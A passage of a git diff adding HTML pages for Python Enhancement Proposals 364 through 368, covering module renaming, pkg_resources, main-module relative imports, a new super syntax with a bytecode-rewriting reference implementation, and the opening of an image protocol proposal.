One important implementation detail: as needed by the PEP 302 API, a +magic string is added to sys.path, and module __path__ attributes in +order to hook in our remapping loader. This magic string is currently +<oldlib> and some changes were necessary to Python’s site.py file +in order to treat all sys.path entries starting with < as +special. Specifically, no attempt is made to make them absolute file +names (since they aren’t file names at all).

+

In order for the remapping import hooks to work, the module or package +must be physically located under its new name. This is because the +import hooks catch only modules that are not already imported, and +cannot be imported by Python’s built-in import rules. Thus, if a +module has been moved, say from Lib/StringIO.py to Lib/stringio.py, +and the former’s .pyc file has been removed, then without the +remapper, this would fail:

+
import StringIO
+
+
+

Instead, with the remapper, this failing import will be caught, the +old name will be looked up in the registered remappings, and in this +case, the new name stringio will be found. The remapper then +attempts to import the new name, and if that succeeds, it binds the +resulting module into sys.modules, under both the old and new names. +Thus, the above import will result in entries in sys.modules for +‘StringIO’ and ‘stringio’, and both will point to the exact same +module object.
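A sketch of the resulting behaviour under the proposed mechanism:

import sys
import StringIO      # caught by the remapper, which imports stringio instead
import stringio

# Both names now refer to the exact same module object:
assert sys.modules['StringIO'] is sys.modules['stringio']
assert StringIO is stringio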

+

Note that no way to disable the remapping machinery is proposed, short +of moving all the .mv files away or programmatically removing them +in some custom start up code. In Python 3.0, the remappings will be +eliminated, leaving only the “new” names.

+
+
+

Programmatic Interface

+

Several methods are added to the sys.stdlib_remapper object, which +third party packages can use to register their own remappings. Note +however that in all cases, there is one and only one mapping from an +old name to a new name. If two .mv files contain different +mappings for an old name, or if a programmatic call is made with an +old name that is already remapped, the previous mapping is lost. This +will not affect any already imported modules.

+

The following methods are available on the sys.stdlib_remapper +object:

+
    +
  • read_mv_file(filename) – Read the given file and register all +remappings found in the file.
  • +
  • read_directory_mv_files(dirname, suffix='.mv') – List the given +directory, reading all files in that directory that have the +matching suffix (.mv by default). For each parsed file, +register all the remappings found in that file.
  • +
  • set_mapping(oldname, newname) – Register a new mapping from an +old module name to a new module name. Both must be the full +dotted-path name to the module. newname may be None in which +case any existing mapping for oldname will be removed (it is not an +error if there is no existing mapping).
  • +
  • get_mapping(oldname, default=None) – Return any registered +newname for the given oldname. If there is no registered remapping, +default is returned.
  • +
+
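For example, a third-party package might use this (proposed) interface from its __init__.py along these lines (mypkg and its module names are placeholders):

import os, sys

# Register a single remapping directly:
sys.stdlib_remapper.set_mapping('mypkg.OldUtils', 'mypkg.oldutils')

# Or register every .mv file shipped alongside the package:
sys.stdlib_remapper.read_directory_mv_files(os.path.dirname(__file__))

# Query the registry:
sys.stdlib_remapper.get_mapping('mypkg.OldUtils')   # -> 'mypkg.oldutils'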
+
+

Open Issues

+
    +
  • Should there be a command line switch and/or environment variable to +disable all remappings?
  • +
  • Should remappings occur recursively?
  • +
  • Should we automatically parse package directories for .mv files when +the package’s __init__.py is loaded? This would allow packages to +easily include .mv files for their own remappings. Compare what the +email package currently has to do if we place its .mv file in +the email package instead of in the oldlib package:
    # Expose old names
    +import os, sys
    +sys.stdlib_remapper.read_directory_mv_files(os.path.dirname(__file__))
    +
    +
    +

    I think we should automatically read a package’s directory for any +.mv files it might contain.

    +
  • +
+
+
+

Reference Implementation

+

A reference implementation, in the form of a patch against the current +(as of this writing) state of the Python 2.6 svn trunk, is available +as SourceForge patch #1675334 [1]. Note that this patch includes a +rename of cStringIO to cstringio, but this is primarily for +illustrative and unit testing purposes. Should the patch be accepted, +we might want to split this change off into other PEP 3108 changes.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0364.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0365/index.html b/pep-0365/index.html new file mode 100644 index 00000000000..94c0a9d8c6e --- /dev/null +++ b/pep-0365/index.html @@ -0,0 +1,221 @@ + + + + + + + + PEP 365 – Adding the pkg_resources module | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 365 – Adding the pkg_resources module

+
+
Author:
+
Phillip J. Eby <pje at telecommunity.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
30-Apr-2007
+
Post-History:
+
30-Apr-2007
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding an enhanced version of the pkg_resources +module to the standard library.

+

pkg_resources is a module used to find and manage Python +package/version dependencies and access bundled files and resources, +including those inside of zipped .egg files. Currently, +pkg_resources is only available through installing the entire +setuptools distribution, but it does not depend on any other part +of setuptools; in effect, it comprises the entire runtime support +library for Python Eggs, and is independently useful.

+

In addition, with one feature addition, this module could support +easy bootstrap installation of several Python package management +tools, including setuptools, workingenv, and zc.buildout.

+
+
+

Proposal

+

Rather than proposing to include setuptools in the standard +library, this PEP proposes only that pkg_resources be added to the +standard library for Python 2.6 and 3.0. pkg_resources is +considerably more stable than the rest of setuptools, with virtually +no new features being added in the last 12 months.

+

However, this PEP also proposes that a new feature be added to +pkg_resources, before being added to the stdlib. Specifically, it +should be possible to do something like:

+
python -m pkg_resources SomePackage==1.2
+
+
+

to request downloading and installation of SomePackage from PyPI. This feature would not be a replacement for easy_install; instead, it would rely on SomePackage having pure-Python .egg files listed for download via the PyPI XML-RPC API, and the eggs would be placed in the $PYTHON_EGG_CACHE directory, where they would not be importable by default. (And no scripts would be installed.) However, if the downloaded egg contains installation bootstrap code, it will be given a chance to run.

+

These restrictions would allow the code to be extremely simple, yet +still powerful enough to support users downloading package management +tools such as setuptools, workingenv and zc.buildout, +simply by supplying the tool’s name on the command line.

+
+
+

Rationale

+

Many users have requested that setuptools be included in the +standard library, to save users needing to go through the awkward +process of bootstrapping it. However, most of the bootstrapping +complexity comes from the fact that setuptools-installed code cannot +use the pkg_resources runtime module unless setuptools is already +installed. Thus, installing setuptools requires (in a sense) that +setuptools already be installed.

+

Other Python package management tools, such as workingenv and +zc.buildout, have similar bootstrapping issues, since they both +make use of setuptools, but also want to provide users with something +approaching a “one-step install”. The complexity of creating bootstrap +utilities for these and any other such tools that arise in future, is +greatly reduced if pkg_resources is already present, and is also +able to download pre-packaged eggs from PyPI.

+

(It would also mean that setuptools would not need to be installed +in order to simply use eggs, as opposed to building them.)

+

Finally, in addition to providing access to eggs built via setuptools or other packaging tools, it should be noted that since Python 2.5 the distutils have installed package metadata (aka PKG-INFO) files, which pkg_resources can read to identify which distributions are already on sys.path. In environments where Python packages are installed using system package tools (like RPM), the pkg_resources module provides an API for detecting what versions of what packages are installed, even if those packages were installed via the distutils instead of setuptools.
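For example, a sketch using the module’s query API (SomePackage is a placeholder):

import pkg_resources

# Look up one installed distribution by project name:
dist = pkg_resources.get_distribution('SomePackage')
print(dist.project_name, dist.version)

# Or iterate over every distribution importable from sys.path:
for dist in pkg_resources.working_set:
    print(dist.project_name, dist.version)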

+
+
+

Implementation and Documentation

+

The pkg_resources implementation is maintained in the Python +SVN repository under /sandbox/trunk/setuptools/; see +pkg_resources.py and pkg_resources.txt. Documentation for the +egg format(s) supported by pkg_resources can be found in +doc/formats.txt. HTML versions of these documents are available +at:

+ +

(These HTML versions are for setuptools 0.6; they may not reflect all +of the changes found in the Subversion trunk’s .txt versions.)

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0365.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0366/index.html b/pep-0366/index.html new file mode 100644 index 00000000000..7b3c80cb95f --- /dev/null +++ b/pep-0366/index.html @@ -0,0 +1,258 @@ + + + + + + + + PEP 366 – Main module explicit relative imports | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 366 – Main module explicit relative imports

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-May-2007
+
Python-Version:
+
2.6, 3.0
+
Post-History:
+
01-May-2007, 04-Jul-2007, 07-Jul-2007, 23-Nov-2007
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a backwards compatible mechanism that permits +the use of explicit relative imports from executable modules within +packages. Such imports currently fail due to an awkward interaction +between PEP 328 and PEP 338.

+

By adding a new module level attribute, this PEP allows relative imports +to work automatically if the module is executed using the -m switch. +A small amount of boilerplate in the module itself will allow the relative +imports to work when the file is executed by name.

+

Guido accepted the PEP in November 2007 [5].

+
+
+

Proposed Change

+

The major proposed change is the introduction of a new module level +attribute, __package__. When it is present, relative imports will +be based on this attribute rather than the module __name__ +attribute.

+

As with the current __name__ attribute, setting __package__ will +be the responsibility of the PEP 302 loader used to import a module. +Loaders which use imp.new_module() to create the module object will +have the new attribute set automatically to None. When the import +system encounters an explicit relative import in a module without +__package__ set (or with it set to None), it will calculate and +store the correct value (__name__.rpartition('.')[0] for normal +modules and __name__ for package initialisation modules). If +__package__ has already been set then the import system will use +it in preference to recalculating the package name from the +__name__ and __path__ attributes.
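Concretely:

# Normal module: __package__ is everything before the last dot ...
'pkg.sub.mod'.rpartition('.')[0]    # -> 'pkg.sub'
# ... while for a package initialisation module (pkg/sub/__init__.py),
# __package__ is simply __name__, i.e. 'pkg.sub'.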

+
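
For illustration only (the helper name below is hypothetical, not part of the PEP), the calculation described above is equivalent to:

+
def _calculate_package(name, is_package_init):
+    # Hypothetical helper mirroring the rule described above.
+    if is_package_init:
+        # Package initialisation modules use their own name.
+        return name
+    # Normal modules drop the last component of the dotted name.
+    return name.rpartition('.')[0]
+
+assert _calculate_package('pkg.sub.mod', False) == 'pkg.sub'
+assert _calculate_package('pkg.sub', True) == 'pkg.sub'
+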

The runpy module will explicitly set the new attribute, basing it off +the name used to locate the module to be executed rather than the name +used to set the module’s __name__ attribute. This will allow relative +imports to work correctly from main modules executed with the -m +switch.

+
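
For illustration (a sketch of the intended behaviour, not runpy's actual code; it assumes a package pkg.sub containing a module mod is available on sys.path):

+
import runpy
+
+# Execute a module the way "python -m pkg.sub.mod" does; the returned
+# globals include __package__ based on the name used to locate the
+# module, not the '__main__' name it runs under.
+globs = runpy.run_module('pkg.sub.mod', run_name='__main__')
+assert globs['__name__'] == '__main__'
+assert globs['__package__'] == 'pkg.sub'
+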

When the main module is specified by its filename, then the +__package__ attribute will be set to None. To allow +relative imports when the module is executed directly, boilerplate +similar to the following would be needed before the first relative +import statement:

+
if __name__ == "__main__" and __package__ is None:
+    __package__ = "expected.package.name"
+
+
+

Note that this boilerplate is sufficient only if the top level package +is already accessible via sys.path. Additional code that manipulates +sys.path would be needed in order for direct execution to work +without the top level package already being importable.

+
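
A sketch of such extended boilerplate (not mandated by this PEP; the package name and directory layout are assumed for illustration):

+
if __name__ == "__main__" and __package__ is None:
+    import os, sys
+    # Assumes this file lives at <project>/expected/package/module.py;
+    # make <project> importable so the top level package can be found.
+    project_dir = os.path.dirname(os.path.dirname(
+        os.path.dirname(os.path.abspath(__file__))))
+    sys.path.insert(0, project_dir)
+    __package__ = "expected.package"
+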

This approach also has the same disadvantage as the use of absolute +imports of sibling modules - if the script is moved to a different +package or subpackage, the boilerplate will need to be updated +manually. It has the advantage that this change need only be made +once per file, regardless of the number of relative imports.

+

Note that setting __package__ to the empty string explicitly is +permitted, and has the effect of disabling all relative imports from +that module (since the import machinery will consider it to be a +top level module in that case). This means that tools like runpy +do not need to provide special case handling for top level modules +when setting __package__.

+
+
+

Rationale for Change

+

The current inability to use explicit relative imports from the main +module is the subject of at least one open SF bug report (#1510172) [1], +and has most likely been a factor in at least a few queries on +comp.lang.python (such as Alan Isaac’s question in [2]).

+

This PEP is intended to provide a solution which permits explicit +relative imports from main modules, without incurring any significant +costs during interpreter startup or normal module import.

+

The section in PEP 338 on relative imports and the main module provides +further details and background on this problem.

+
+
+

Reference Implementation

+

Rev 47142 in SVN implemented an early variant of this proposal which stored the main module’s real module name in the __module_name__ attribute. It was reverted because Python 2.5 was already in beta by that time.

+

Patch 1487 [4] is the proposed implementation for this PEP.

+
+
+

Alternative Proposals

+

PEP 3122 proposed addressing this problem by changing the way +the main module is identified. That’s a significant compatibility cost +to incur to fix something that is a pretty minor bug in the overall +scheme of things, and the PEP was rejected [3].

+

The advantage of the proposal in this PEP is that its only impact on +normal code is the small amount of time needed to set the extra +attribute when importing a module. Relative imports themselves should +be sped up fractionally, as the package name is cached in the module +globals, rather than having to be worked out again for each relative +import.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0366.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0367/index.html b/pep-0367/index.html new file mode 100644 index 00000000000..6bd31525206 --- /dev/null +++ b/pep-0367/index.html @@ -0,0 +1,712 @@ + + + + + + + + PEP 367 – New Super | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 367 – New Super

+
+
Author:
+
Calvin Spealman <ironfroggy at gmail.com>, +Tim Delaney <timothy.c.delaney at gmail.com>
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
28-Apr-2007
+
Python-Version:
+
2.6
+
Post-History:
+
28-Apr-2007, +29-Apr-2007, +29-Apr-2007, +14-May-2007
+
+
+
+
Table of Contents +
+
+

Numbering Note

+

This PEP has been renumbered to PEP 3135. The text below is the last +version submitted under the old number.

+
+
+

Abstract

+

This PEP proposes syntactic sugar for use of the super type to automatically +construct instances of the super type binding to the class that a method was +defined in, and the instance (or class object for classmethods) that the method +is currently acting upon.

+

The premise of the new super usage suggested is as follows:

+
super.foo(1, 2)
+
+
+

to replace the old:

+
super(Foo, self).foo(1, 2)
+
+
+

and the current __builtin__.super be aliased to __builtin__.__super__ +(with __builtin__.super to be removed in Python 3.0).

+

It is further proposed that assignment to super become a SyntaxError, +similar to the behaviour of None.

+
+
+

Rationale

+

The current usage of super requires explicitly passing both the class and the instance it must operate from, breaking the DRY (Don’t Repeat Yourself) rule. This hinders any change in class name, and is often considered a wart by many.

+
+
+

Specification

+

Within the specification section, some special terminology will be used to +distinguish similar and closely related concepts. “super type” will refer to +the actual builtin type named “super”. A “super instance” is simply an instance +of the super type, which is associated with a class and possibly with an +instance of that class.

+

Because the new super semantics are not backwards compatible with Python +2.5, the new semantics will require a __future__ import:

+
from __future__ import new_super
+
+
+

The current __builtin__.super will be aliased to __builtin__.__super__. +This will occur regardless of whether the new super semantics are active. +It is not possible to simply rename __builtin__.super, as that would affect +modules that do not use the new super semantics. In Python 3.0 it is +proposed that the name __builtin__.super will be removed.

+

Replacing the old usage of super, calls to the next class in the MRO (method +resolution order) can be made without explicitly creating a super +instance (although doing so will still be supported via __super__). Every +function will have an implicit local named super. This name behaves +identically to a normal local, including use by inner functions via a cell, +with the following exceptions:

+
    +
  1. Assigning to the name super will raise a SyntaxError at compile time;
  2. +
  3. Calling a static method or normal function that accesses the name super +will raise a TypeError at runtime.
  4. +
+

Every function that uses the name super, or has an inner function that +uses the name super, will include a preamble that performs the equivalent +of:

+
super = __builtin__.__super__(<class>, <instance>)
+
+
+

where <class> is the class that the method was defined in, and +<instance> is the first parameter of the method (normally self for +instance methods, and cls for class methods). For static methods and normal +functions, <class> will be None, resulting in a TypeError being +raised during the preamble.

+
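
In terms of current Python semantics, the effect of the preamble is roughly the following (an illustrative sketch with the class written out explicitly):

+
class Base(object):
+    def greet(self):
+        return 'Base'
+
+class Derived(Base):
+    def greet(self):
+        # Under this PEP the body would simply be:
+        #     return 'Derived' + super.greet()
+        # with the implicit preamble binding super to the equivalent of:
+        bound = super(Derived, self)   # __super__(<class>, <instance>)
+        return 'Derived' + bound.greet()
+
+assert Derived().greet() == 'DerivedBase'
+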

Note: The relationship between super and __super__ is similar to that +between import and __import__.

+

Much of this was discussed in the thread of the python-dev list, “Fixing super +anyone?” [1].

+
+

Open Issues

+
+

Determining the class object to use

+

The exact mechanism for associating the method with the defining class is not +specified in this PEP, and should be chosen for maximum performance. For +CPython, it is suggested that the class instance be held in a C-level variable +on the function object which is bound to one of NULL (not part of a class), +Py_None (static method) or a class object (instance or class method).

+
+
+

Should super actually become a keyword?

+

With this proposal, super would become a keyword to the same extent that None is a keyword. It is possible that further restricting the super name may simplify implementation; however, some are against the actual keyword-ization of super. The simplest solution is often the correct one, and adding keywords to the language when they are not needed is rarely the simplest solution. Still, it may solve other open issues.

+
+
+
+

Closed Issues

+
+

super used with __call__ attributes

+

It was considered that instantiating super instances the classic way might be a problem, because calling such an instance would look up the __call__ attribute and thus try to perform an automatic super lookup to the next class in the MRO. However, this was found to be false, because calling an object only looks up the __call__ method directly on the object’s type. The following example shows this in action.

+
class A(object):
+    def __call__(self):
+        return '__call__'
+    def __getattribute__(self, attr):
+        if attr == '__call__':
+            return lambda: '__getattribute__'
+a = A()
+assert a() == '__call__'
+assert a.__call__() == '__getattribute__'
+
+
+

In any case, with the renaming of __builtin__.super to +__builtin__.__super__ this issue goes away entirely.

+
+
+
+
+

Reference Implementation

+

It is impossible to implement the above specification entirely in Python. This reference implementation has the following differences from the specification:

+
    +
  1. New super semantics are implemented using bytecode hacking.
  2. +
  3. Assignment to super is not a SyntaxError. Also see point #4.
  4. +
  5. Classes must either use the metaclass autosuper_meta or inherit from +the base class autosuper to acquire the new super semantics.
  6. +
  7. super is not an implicit local variable. In particular, for inner +functions to be able to use the super instance, there must be an assignment +of the form super = super in the method.
  8. +
+

The reference implementation assumes that it is being run on Python 2.5+.

+
#!/usr/bin/env python
+#
+# autosuper.py
+
+from array import array
+import dis
+import new
+import types
+import __builtin__
+__builtin__.__super__ = __builtin__.super
+del __builtin__.super
+
+# We need these for modifying bytecode
+from opcode import opmap, HAVE_ARGUMENT, EXTENDED_ARG
+
+LOAD_GLOBAL = opmap['LOAD_GLOBAL']
+LOAD_NAME = opmap['LOAD_NAME']
+LOAD_CONST = opmap['LOAD_CONST']
+LOAD_FAST = opmap['LOAD_FAST']
+LOAD_ATTR = opmap['LOAD_ATTR']
+STORE_FAST = opmap['STORE_FAST']
+LOAD_DEREF = opmap['LOAD_DEREF']
+STORE_DEREF = opmap['STORE_DEREF']
+CALL_FUNCTION = opmap['CALL_FUNCTION']
+STORE_GLOBAL = opmap['STORE_GLOBAL']
+DUP_TOP = opmap['DUP_TOP']
+POP_TOP = opmap['POP_TOP']
+NOP = opmap['NOP']
+JUMP_FORWARD = opmap['JUMP_FORWARD']
+ABSOLUTE_TARGET = dis.hasjabs
+
+def _oparg(code, opcode_pos):
+    return code[opcode_pos+1] + (code[opcode_pos+2] << 8)
+
+def _bind_autosuper(func, cls):
+    co = func.func_code
+    name = func.func_name
+    newcode = array('B', co.co_code)
+    codelen = len(newcode)
+    newconsts = list(co.co_consts)
+    newvarnames = list(co.co_varnames)
+
+    # Check if the global 'super' keyword is already present
+    try:
+        sn_pos = list(co.co_names).index('super')
+    except ValueError:
+        sn_pos = None
+
+    # Check if the varname 'super' keyword is already present
+    try:
+        sv_pos = newvarnames.index('super')
+    except ValueError:
+        sv_pos = None
+
+    # Check if the cellvar 'super' keyword is already present
+    try:
+        sc_pos = list(co.co_cellvars).index('super')
+    except ValueError:
+        sc_pos = None
+
+    # If 'super' isn't used anywhere in the function, we don't have anything to do
+    if sn_pos is None and sv_pos is None and sc_pos is None:
+        return func
+
+    c_pos = None
+    s_pos = None
+    n_pos = None
+
+    # Check if the 'cls_name' and 'super' objects are already in the constants
+    for pos, o in enumerate(newconsts):
+        if o is cls:
+            c_pos = pos
+
+        if o is __super__:
+            s_pos = pos
+
+        if o == name:
+            n_pos = pos
+
+    # Add in any missing objects to constants and varnames
+    if c_pos is None:
+        c_pos = len(newconsts)
+        newconsts.append(cls)
+
+    if n_pos is None:
+        n_pos = len(newconsts)
+        newconsts.append(name)
+
+    if s_pos is None:
+        s_pos = len(newconsts)
+        newconsts.append(__super__)
+
+    if sv_pos is None:
+        sv_pos = len(newvarnames)
+        newvarnames.append('super')
+
+    # This goes at the start of the function. It is:
+    #
+    #   super = __super__(cls, self)
+    #
+    # If 'super' is a cell variable, we store to both the
+    # local and cell variables (i.e. STORE_FAST and STORE_DEREF).
+    #
+    preamble = [
+        LOAD_CONST, s_pos & 0xFF, s_pos >> 8,
+        LOAD_CONST, c_pos & 0xFF, c_pos >> 8,
+        LOAD_FAST, 0, 0,
+        CALL_FUNCTION, 2, 0,
+    ]
+
+    if sc_pos is None:
+        # 'super' is not a cell variable - we can just use the local variable
+        preamble += [
+            STORE_FAST, sv_pos & 0xFF, sv_pos >> 8,
+        ]
+    else:
+        # If 'super' is a cell variable, we need to handle LOAD_DEREF.
+        preamble += [
+            DUP_TOP,
+            STORE_FAST, sv_pos & 0xFF, sv_pos >> 8,
+            STORE_DEREF, sc_pos & 0xFF, sc_pos >> 8,
+        ]
+
+    preamble = array('B', preamble)
+
+    # Bytecode for loading the local 'super' variable.
+    load_super = array('B', [
+        LOAD_FAST, sv_pos & 0xFF, sv_pos >> 8,
+    ])
+
+    preamble_len = len(preamble)
+    need_preamble = False
+    i = 0
+
+    while i < codelen:
+        opcode = newcode[i]
+        need_load = False
+        remove_store = False
+
+        if opcode == EXTENDED_ARG:
+            raise TypeError("Cannot use 'super' in function with EXTENDED_ARG opcode")
+
+        # If the opcode is an absolute target it needs to be adjusted
+        # to take into account the preamble.
+        elif opcode in ABSOLUTE_TARGET:
+            oparg = _oparg(newcode, i) + preamble_len
+            newcode[i+1] = oparg & 0xFF
+            newcode[i+2] = oparg >> 8
+
+        # If LOAD_GLOBAL(super) or LOAD_NAME(super) then we want to change it into
+        # LOAD_FAST(super)
+        elif (opcode == LOAD_GLOBAL or opcode == LOAD_NAME) and _oparg(newcode, i) == sn_pos:
+            need_preamble = need_load = True
+
+        # If LOAD_FAST(super) then we just need to add the preamble
+        elif opcode == LOAD_FAST and _oparg(newcode, i) == sv_pos:
+            need_preamble = need_load = True
+
+        # If LOAD_DEREF(super) then we change it into LOAD_FAST(super) because
+        # it's slightly faster.
+        elif opcode == LOAD_DEREF and _oparg(newcode, i) == sc_pos:
+            need_preamble = need_load = True
+
+        if need_load:
+            newcode[i:i+3] = load_super
+
+        i += 1
+
+        if opcode >= HAVE_ARGUMENT:
+            i += 2
+
+    # No changes needed - get out.
+    if not need_preamble:
+        return func
+
+    # Our preamble will have 3 things on the stack
+    co_stacksize = max(3, co.co_stacksize)
+
+    # Conceptually, our preamble is on the `def` line.
+    co_lnotab = array('B', co.co_lnotab)
+
+    if co_lnotab:
+        co_lnotab[0] += preamble_len
+
+    co_lnotab = co_lnotab.tostring()
+
+    # Our code consists of the preamble and the modified code.
+    codestr = (preamble + newcode).tostring()
+
+    codeobj = new.code(co.co_argcount, len(newvarnames), co_stacksize,
+                       co.co_flags, codestr, tuple(newconsts), co.co_names,
+                       tuple(newvarnames), co.co_filename, co.co_name,
+                       co.co_firstlineno, co_lnotab, co.co_freevars,
+                       co.co_cellvars)
+
+    func.func_code = codeobj
+    func.func_class = cls
+    return func
+
+class autosuper_meta(type):
+    def __init__(cls, name, bases, clsdict):
+        UnboundMethodType = types.UnboundMethodType
+
+        for v in vars(cls):
+            o = getattr(cls, v)
+            if isinstance(o, UnboundMethodType):
+                _bind_autosuper(o.im_func, cls)
+
+class autosuper(object):
+    __metaclass__ = autosuper_meta
+
+if __name__ == '__main__':
+    class A(autosuper):
+        def f(self):
+            return 'A'
+
+    class B(A):
+        def f(self):
+            return 'B' + super.f()
+
+    class C(A):
+        def f(self):
+            def inner():
+                return 'C' + super.f()
+
+            # Needed to put 'super' into a cell
+            super = super
+            return inner()
+
+    class D(B, C):
+        def f(self, arg=None):
+            var = None
+            return 'D' + super.f()
+
+    assert D().f() == 'DBCA'
+
+
+

Disassembly of B.f and C.f reveals the different preambles used when super +is simply a local variable compared to when it is used by an inner function.

+
>>> dis.dis(B.f)
+
+214           0 LOAD_CONST               4 (<type 'super'>)
+              3 LOAD_CONST               2 (<class '__main__.B'>)
+              6 LOAD_FAST                0 (self)
+              9 CALL_FUNCTION            2
+             12 STORE_FAST               1 (super)
+
+215          15 LOAD_CONST               1 ('B')
+             18 LOAD_FAST                1 (super)
+             21 LOAD_ATTR                1 (f)
+             24 CALL_FUNCTION            0
+             27 BINARY_ADD
+             28 RETURN_VALUE
+
+
+
>>> dis.dis(C.f)
+
+218           0 LOAD_CONST               4 (<type 'super'>)
+              3 LOAD_CONST               2 (<class '__main__.C'>)
+              6 LOAD_FAST                0 (self)
+              9 CALL_FUNCTION            2
+             12 DUP_TOP
+             13 STORE_FAST               1 (super)
+             16 STORE_DEREF              0 (super)
+
+219          19 LOAD_CLOSURE             0 (super)
+             22 LOAD_CONST               1 (<code object inner at 00C160A0, file "autosuper.py", line 219>)
+             25 MAKE_CLOSURE             0
+             28 STORE_FAST               2 (inner)
+
+223          31 LOAD_FAST                1 (super)
+             34 STORE_DEREF              0 (super)
+
+224          37 LOAD_FAST                2 (inner)
+             40 CALL_FUNCTION            0
+             43 RETURN_VALUE
+
+
+

Note that in the final implementation, the preamble would not be part of the +bytecode of the method, but would occur immediately following unpacking of +parameters.

+
+
+

Alternative Proposals

+
+

No Changes

+

Although it’s always attractive to just keep things how they are, people have sought a change in the usage of super for some time, and for the good reasons mentioned previously:

+
    +
  • Decoupling from the class name (which might not even be bound to the +right class anymore!)
  • +
  • Simpler looking, cleaner super calls would be better
  • +
+
+
+

Dynamic attribute on super type

+

The proposal adds a dynamic attribute lookup to the super type, which will +automatically determine the proper class and instance parameters. Each super +attribute lookup identifies these parameters and performs the super lookup on +the instance, as the current super implementation does with the explicit +invocation of a super instance upon a class and instance.

+

This proposal relies on sys._getframe(), which is not appropriate for anything +except a prototype implementation.

+
+
+

super(__this_class__, self)

+

This is nearly an anti-proposal, as it basically relies on the acceptance of +the __this_class__ PEP, which proposes a special name that would always be +bound to the class within which it is used. If that is accepted, __this_class__ +could simply be used instead of the class’ name explicitly, solving the name +binding issues [2].

+
+
+

self.__super__.foo(*args)

+

The __super__ attribute is mentioned in this PEP in several places, and could be a candidate for the complete solution, actually using it explicitly instead of any direct super usage. However, double-underscore names are usually an internal detail, and are generally kept out of everyday code.

+
+
+

super(self, *args) or __super__(self, *args)

+

This solution only solves the problem of the type indication, does not handle differently named super methods, and is explicit about the name of the instance. It is less flexible because it cannot be applied to other method names in cases where that is needed. One use case it fails to handle is where a base class has a factory classmethod and a subclass has two factory classmethods, both of which need to make proper super calls to the one in the base class.

+
+
+

super.foo(self, *args)

+

This variation actually eliminates the problems with locating the proper +instance, and if any of the alternatives were pushed into the spotlight, I +would want it to be this one.

+
+
+

super or super()

+

This proposal leaves no room for different names, signatures, or application +to other classes, or instances. A way to allow some similar use alongside the +normal proposal would be favorable, encouraging good design of multiple +inheritance trees and compatible methods.

+
+
+

super(*p, **kw)

+

There has been the proposal that directly calling super(*p, **kw) would +be equivalent to calling the method on the super object with the same name +as the method currently being executed i.e. the following two methods would be +equivalent:

+
def f(self, *p, **kw):
+    super.f(*p, **kw)
+
+
+
def f(self, *p, **kw):
+    super(*p, **kw)
+
+
+

There is strong sentiment for and against this, but implementation and style +concerns are obvious. Guido has suggested that this should be excluded from +this PEP on the principle of KISS (Keep It Simple Stupid).

+
+
+
+

History

+
+
29-Apr-2007 - Changed title from “Super As A Keyword” to “New Super”
    +
  • Updated much of the language and added a terminology section +for clarification in confusing places.
  • +
  • Added reference implementation and history sections.
  • +
+
+
06-May-2007 - Updated by Tim Delaney to reflect discussions on the python-3000
and python-dev mailing lists.
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0367.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0368/index.html b/pep-0368/index.html new file mode 100644 index 00000000000..d820fde4548 --- /dev/null +++ b/pep-0368/index.html @@ -0,0 +1,971 @@ + + + + + + + + PEP 368 – Standard image protocol and class | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 368 – Standard image protocol and class

+
+
Author:
+
Lino Mastrodomenico <l.mastrodomenico at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
28-Jun-2007
+
Python-Version:
+
2.6, 3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

The current situation of image storage and manipulation in the Python +world is extremely fragmented: almost every library that uses image +objects has implemented its own image class, incompatible with +everyone else’s and often not very pythonic. A basic RGB image class +exists in the standard library (Tkinter.PhotoImage), but is pretty +much unusable, and unused, for anything except Tkinter programming.

+

This fragmentation not only takes up valuable space in the developers’ minds, but also makes the exchange of images between different libraries (needed in relatively common use cases) slower and more complex than it needs to be.

+

This PEP proposes to improve the situation by defining a simple and +pythonic image protocol/interface that can be hopefully accepted and +implemented by existing image classes inside and outside the standard +library without breaking backward compatibility with their existing +user bases. In practice this is a definition of how a minimal +image-like object should look and act (in a similar way to the +read() and write() methods in file-like objects).

+

The inclusion in the standard library of a class that provides basic +image manipulation functionality and implements the new protocol is +also proposed, together with a mixin class that helps adding support +for the protocol to existing image classes.

+
+
+

PEP Deferral

+

Further exploration of the concepts covered in this PEP has been deferred +for lack of a current champion interested in promoting the goals of the PEP +and collecting and incorporating feedback, and with sufficient available +time to do so effectively.

+
+
+

Rationale

+

